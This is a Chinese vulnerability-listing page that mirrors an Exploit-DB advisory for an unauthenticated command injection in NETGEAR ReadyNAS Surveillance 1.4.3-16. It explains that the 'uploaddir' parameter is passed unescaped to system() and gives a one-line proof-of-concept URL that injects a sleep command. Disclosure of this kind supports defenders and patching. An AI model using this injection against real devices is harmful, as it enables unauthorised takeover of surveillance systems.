漏洞概要

缺陷编号:
N/A

漏洞标题:
NETGEAR ReadyNAS Surveillance 1.4.3-16 – Remote Command Execution

提交时间:
2017-09-27

危害等级:

相关厂商:

漏洞分类:
exp公布

关注度:
共 12 人关注

漏洞详情

EDB-ID: 42956 Author: Kacper Szurek Published: 2017-09-27
CVE: N/A Type: Webapps Platform: Hardware

E-DB Verified:
Waiting verification

Exploit:

Download Exploit Code Download

/

View Raw

Vulnerable App:
N/A
# Exploit Netgear ReadyNAS Surveillance 1.4.3-16 Unauthenticated RCE
# Date: 27.09.2017
# Software Link: https://www.netgear.com/
# Exploit Author: Kacper Szurek
# Contact: https://twitter.com/KacperSzurek
# Website: https://security.szurek.pl/
# Category: remote
   
1. Description
  
$_GET['uploaddir'] is not escaped and passed to system() through $tmp_upload_dir.

https://security.szurek.pl/netgear-ready-nas-surveillance-14316-unauthenticated-rce.html
 
2. Proof of Concept

http://IP/upgrade_handle.php?cmd=writeuploaddir&uploaddir=%27;sleep%205;%27

发表评论

电子邮件地址不会被公开。 必填项已用*标注